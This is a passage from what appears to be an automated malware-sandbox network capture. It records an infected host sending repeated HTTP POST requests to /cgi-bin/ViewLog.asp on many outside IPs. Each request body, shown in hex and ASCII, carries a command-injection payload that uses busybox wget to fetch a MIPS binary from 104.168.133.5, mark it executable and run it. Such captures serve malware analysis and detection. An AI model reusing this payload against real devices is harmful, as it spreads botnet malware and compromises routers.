                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:49.863169909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:52.327064037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.934814930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:06.150445938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:25.861581087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.724037886 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              171192.168.2.145291694.121.73.2248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:48.173068047 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              172192.168.2.144939631.44.137.208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:48.173695087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              173192.168.2.144151262.33.133.588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:48.243814945 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.550755978 CET405INHTTP/1.1 404 Not Found
                                              Server: nginx/1.0.15
                                              Date: Thu, 23 Nov 2023 04:15:48 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 169
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              174192.168.2.145964031.171.228.1098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:49.779551983 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              175192.168.2.143354262.29.57.1848080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.214556932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              176192.168.2.145554831.44.132.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.222206116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              177192.168.2.144070831.44.141.2298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.235006094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              178192.168.2.143810831.136.149.2528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.785434008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:53.862977982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.006660938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.038181067 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:36.101181984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:25.251276970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              179192.168.2.144305031.12.75.1508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.911129951 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              180192.168.2.143802831.136.178.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.968600035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.527086973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:52.647059917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:54.886918068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.494689941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
